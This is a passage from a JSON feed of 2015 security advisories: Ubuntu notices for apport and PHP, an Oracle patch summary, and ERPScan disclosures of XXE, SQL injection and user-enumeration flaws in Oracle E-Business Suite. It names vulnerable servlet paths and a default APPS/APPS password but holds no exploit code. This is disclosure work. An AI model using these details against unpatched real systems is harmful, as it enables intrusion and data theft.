to support the community and to\r\ndo active vulnerability research in order to aid improving the\r\nsecurity and reliability of software in general:\r\n\r\nhttp://secunia.com/secunia_research/\r\n\r\nSecunia regularly hires new skilled team members. Check the URL below\r\nto see currently vacant positions:\r\n\r\nhttp://secunia.com/corporate/jobs/\r\n\r\nSecunia offers a FREE mailing list called Secunia Security Advisories:\r\n\r\nhttp://secunia.com/advisories/mailing_lists/\r\n\r\n======================================================================\r\n\r\n9) Verification \r\n\r\nPlease verify this advisory by visiting the Secunia website:\r\nhttp://secunia.com/secunia_research/2015-04/\r\n\r\nComplete list of vulnerability reports published by Secunia Research:\r\nhttp://secunia.com/secunia_research/\r\n\r\n======================================================================\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32659", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32659", "title": "Secunia Research: Oracle Outside In Two Buffer Overflow Vulnerabilities", "type": "securityvulns", "cvss": {"score": 1.5, "vector": "AV:LOCAL/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-1341"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2782-1\r\nOctober 27, 2015\r\n\r\napport vulnerability\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\nApport could be made to run programs as an administrator.\r\n\r\nSoftware Description:\r\n- apport: automatically generate crash reports for 
debugging\r\n\r\nDetails:\r\n\r\nGabriel Campana discovered that Apport incorrectly handled Python module\r\nimports. A local attacker could use this issue to elevate privileges.\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n apport 2.19.1-0ubuntu4\r\n\r\nUbuntu 15.04:\r\n apport 2.17.2-0ubuntu1.7\r\n\r\nUbuntu 14.04 LTS:\r\n apport 2.14.1-0ubuntu3.18\r\n\r\nUbuntu 12.04 LTS:\r\n apport 2.0.1-0ubuntu17.13\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2782-1\r\n CVE-2015-1341\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/apport/2.19.1-0ubuntu4\r\n https://launchpad.net/ubuntu/+source/apport/2.17.2-0ubuntu1.7\r\n https://launchpad.net/ubuntu/+source/apport/2.14.1-0ubuntu3.18\r\n https://launchpad.net/ubuntu/+source/apport/2.0.1-0ubuntu17.13\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32660", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32660", "title": "[USN-2782-1] Apport vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:03", "bulletinFamily": "software", "cvelist": ["CVE-2015-4894", "CVE-2015-4000", "CVE-2015-4851", "CVE-2015-4895", "CVE-2015-4905", "CVE-2015-4866", "CVE-2015-4832", "CVE-2015-4822", "CVE-2015-4830", "CVE-2015-4804", "CVE-2015-4816", "CVE-2015-0235", "CVE-2015-1793", "CVE-2015-4793", "CVE-2015-4863", "CVE-2015-4913", "CVE-2015-4892", "CVE-2014-0191", "CVE-2015-4796", "CVE-2015-4864", "CVE-2015-4794", "CVE-2015-4887", "CVE-2015-2642", "CVE-2015-4860", "CVE-2015-4868", 
"CVE-1999-0377", "CVE-2015-4820", "CVE-2015-4903", "CVE-2015-0286", "CVE-2015-4906", "CVE-2015-4843", "CVE-2015-4842", "CVE-2015-4910", "CVE-2015-4872", "CVE-2015-4846", "CVE-2014-3576", "CVE-2015-4876", "CVE-2014-3571", "CVE-2015-4883", "CVE-2014-7940", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4882", "CVE-2015-4801", "CVE-2015-4878", "CVE-2015-4799", "CVE-2015-4811", "CVE-2015-4834", "CVE-2015-4762", "CVE-2015-4815", "CVE-2015-4812", "CVE-2015-4839", "CVE-2015-4798", "CVE-2015-4891", "CVE-2015-4734", "CVE-2015-4899", "CVE-2015-4865", "CVE-2015-4915", "CVE-2015-4871", "CVE-2015-4800", "CVE-2015-4869", "CVE-2015-4828", "CVE-2015-4803", "CVE-2015-4875", "CVE-2015-4902", "CVE-2015-4917", "CVE-2015-4909", "CVE-2015-4791", "CVE-2015-4805", "CVE-2015-4849", "CVE-2015-4879", "CVE-2015-4888", "CVE-2015-4838", "CVE-2015-4850", "CVE-2015-4806", "CVE-2015-4825", "CVE-2015-3144", "CVE-2015-4797", "CVE-2015-4792", "CVE-2015-4837", "CVE-2015-4904", "CVE-2015-4810", "CVE-2015-4827", "CVE-2014-0050", "CVE-2015-4817", "CVE-2015-4908", "CVE-2015-4912", "CVE-2015-4833", "CVE-2015-4847", "CVE-2015-4855", "CVE-2015-4848", "CVE-2015-4730", "CVE-2015-4819", "CVE-2015-4896", "CVE-2015-2633", "CVE-2015-4807", "CVE-2015-4901", "CVE-2015-4835", "CVE-2015-4873", "CVE-2015-4766", "CVE-2015-4795", "CVE-2015-4907", "CVE-2015-4859", "CVE-2015-1829", "CVE-2015-4898", "CVE-2015-4874", "CVE-2015-4836", "CVE-2015-4824", "CVE-2015-4900", "CVE-2015-4831", "CVE-2015-4861", "CVE-2015-4911", "CVE-2015-4886", "CVE-2015-2608", "CVE-2015-4809", "CVE-2015-4877", "CVE-2015-4844", "CVE-2015-4870", "CVE-2015-4881", "CVE-2015-4840", "CVE-2015-4856", "CVE-2015-4845", "CVE-2015-4914", "CVE-2015-4893", "CVE-2015-4916", "CVE-2015-4826", "CVE-2014-1569", "CVE-2015-4862", "CVE-2010-1622", "CVE-2015-4857", "CVE-2015-4890", "CVE-2015-4867", "CVE-2015-4884", "CVE-2015-4813", "CVE-2015-4841", "CVE-2015-4818", "CVE-2015-4880", "CVE-2015-1791", "CVE-2015-4823", "CVE-2015-4821"], "description": "Quarterly update closes 140 
vulnerabilities in different applications.", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14755", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14755", "title": "Oracle / Sun / PeopleSoft / MySQL multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-7803", "CVE-2015-7804"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2786-1\r\nOctober 28, 2015\r\n\r\nphp5 vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\nPHP could be made to crash if it processed a specially crafted file.\r\n\r\nSoftware Description:\r\n- php5: HTML-embedded scripting language interpreter\r\n\r\nDetails:\r\n\r\nIt was discovered that the PHP phar extension incorrectly handled certain\r\nfiles. A remote attacker could use this issue to cause PHP to crash,\r\nresulting in a denial of service. 
(CVE-2015-7803, CVE-2015-7804)\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n libapache2-mod-php5 5.6.11+dfsg-1ubuntu3.1\r\n php5-cgi 5.6.11+dfsg-1ubuntu3.1\r\n php5-cli 5.6.11+dfsg-1ubuntu3.1\r\n php5-fpm 5.6.11+dfsg-1ubuntu3.1\r\n\r\nUbuntu 15.04:\r\n libapache2-mod-php5 5.6.4+dfsg-4ubuntu6.4\r\n php5-cgi 5.6.4+dfsg-4ubuntu6.4\r\n php5-cli 5.6.4+dfsg-4ubuntu6.4\r\n php5-fpm 5.6.4+dfsg-4ubuntu6.4\r\n\r\nUbuntu 14.04 LTS:\r\n libapache2-mod-php5 5.5.9+dfsg-1ubuntu4.14\r\n php5-cgi 5.5.9+dfsg-1ubuntu4.14\r\n php5-cli 5.5.9+dfsg-1ubuntu4.14\r\n php5-fpm 5.5.9+dfsg-1ubuntu4.14\r\n\r\nUbuntu 12.04 LTS:\r\n libapache2-mod-php5 5.3.10-1ubuntu3.21\r\n php5-cgi 5.3.10-1ubuntu3.21\r\n php5-cli 5.3.10-1ubuntu3.21\r\n php5-fpm 5.3.10-1ubuntu3.21\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2786-1\r\n CVE-2015-7803, CVE-2015-7804\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/php5/5.6.11+dfsg-1ubuntu3.1\r\n https://launchpad.net/ubuntu/+source/php5/5.6.4+dfsg-4ubuntu6.4\r\n https://launchpad.net/ubuntu/+source/php5/5.5.9+dfsg-1ubuntu4.14\r\n https://launchpad.net/ubuntu/+source/php5/5.3.10-1ubuntu3.21\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32651", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32651", "title": "[USN-2786-1] PHP vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4849"], 
"description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite - XXE injection\r\nAdvisory ID: [ERPSCAN-15-029]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-029-oracle-e-business-suite-xxe-injection-vulnerability/\r\nDate published: 21.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: XML External Entity [CWE-611]\r\nImpact: information disclosure, DoS, SSRF, NTLM relay\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4849\r\nCVSS Information\r\nCVSS Base Score: 6.8 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Medium (M)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity Partial (P)\r\nA : Impact to Availability Partial (P)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\n1) An attacker can read an arbitrary file on a server by sending a\r\ncorrect XML request with a crafted DTD and reading the response from\r\nthe service.\r\n2) An attacker can perform a DoS attack (for example, XML Entity Expansion).\r\n3) An SMB Relay attack is a type of Man-in-the-Middle attack where the\r\nattacker asks the victim to authenticate into a machine controlled by\r\nthe attacker, then relays the credentials to the target. The attacker\r\nforwards the authentication information both ways and gets access.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nVulnerable servlet:\r\n/OA_HTML/IspPunchInServlet\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. 
REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-029-oracle-e-business-suite-xxe-injection-vulnerability/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. 
Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAddress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 
94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32654", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32654", "title": "[ERPSCAN-15-029] Oracle E-Business Suite - XXE injection Vulnerability", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:03", "bulletinFamily": "software", "cvelist": ["CVE-2015-7803", "CVE-2015-7804"], "description": "PHAR extension DoS.", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14753", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14753", "title": "PHP security vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4846"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite SQL injection\r\nAdvisory ID: [ERPSCAN-15-026]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-026-oracle-e-business-suite-sql-injection-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: SQL injection\r\nImpact: SQL injection, RCE\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4846\r\nCVSS Information\r\nCVSS Base Score: 3.6 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) High (H)\r\nAu : Authentication (Level of authentication needed to exploit) Single (S)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity Partial (P)\r\nA : Impact to Availability None (N)\r\n\r\n3. 
VULNERABILITY DESCRIPTION\r\n\r\nThe problem is caused by an SQL injection vulnerability. The code\r\ncomprises an SQL statement that contains strings that can be altered\r\nby an attacker. The manipulated SQL statement can then be used to\r\nretrieve additional data from the database or to modify the data.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3, 12.1.4\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin, Egor Karbutov (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nOne of SQL extensions (afamexts.sql) does not filter user input values\r\nwhich may lead to SQL injection. The only defense mechanism is a\r\npassword for APPS. If an attacker knows the password (for example,\r\ndefault password APPS/APPS), he will be able to exploit SQL injection\r\nwith high privilege.\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-026-oracle-e-business-suite-sql-injection-vulnerability/\r\nhttp://erpscan.com/press-center/press-release/erpscan-took-a-closer-look-at-oracle-ebs-security-6-vulnerabilities-patched-in-recent-update/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. 
It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. 
We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAddress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 
94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32657", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32657", "title": "[ERPSCAN-15-026] Oracle E-Business Suite - SQL injection Vulnerability", "type": "securityvulns", "cvss": {"score": 3.6, "vector": "AV:NETWORK/AC:HIGH/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4886"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite XXE injection\r\nAdvisory ID: [ERPSCAN-15-028]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-028-oracle-e-business-suite-xxe-injection-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: XML External Entity [CWE-611]\r\nImpact: information disclosure, DoS, SSRF, NTLM relay\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4886\r\nCVSS Information\r\nCVSS Base Score: 6.4 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Low (L)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity Partial (P)\r\nA : Impact to Availability None (N)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\n1) An attacker can read an arbitrary file on a server by sending a\r\ncorrect XML request with a crafted DTD and reading the response from\r\nthe service.\r\n2) An attacker can perform a DoS attack (for example, XML Entity Expansion).\r\n3) An SMB Relay attack is a type of Man-in-the-Middle attack where the\r\nattacker asks the victim to authenticate into a machine controlled by\r\nthe attacker, then relays the credentials to the target. 
The attacker\r\nforwards the authentication information both ways and gets access.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nVulnerable servlet:\r\n/OA_HTML/copxml\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-028-oracle-e-business-suite-xxe-injection-vulnerability/\r\n\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. 
They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. 
Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAddress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 
94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32653", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32653", "title": "[ERPSCAN-15-028] Oracle E-Business Suite - XXE injection Vulnerability", "type": "securityvulns", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4845"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite - Database user enumeration\r\nAdvisory ID: [ERPSCAN-15-025]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-025-oracle-e-business-suite-database-user-enumeration-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: User Enumeration\r\nImpact: user enumeration, SSRF\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4845\r\nCVSS Information\r\nCVSS Base Score: 4.3 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Medium (M)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity None (N)\r\nA : Impact to Availability None (N)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\nThere is a script in EBS that is used to connect to the database and\r\ndisplays the connection status. Different connection results can help\r\nan attacker to find existing database accounts.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.2.4\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 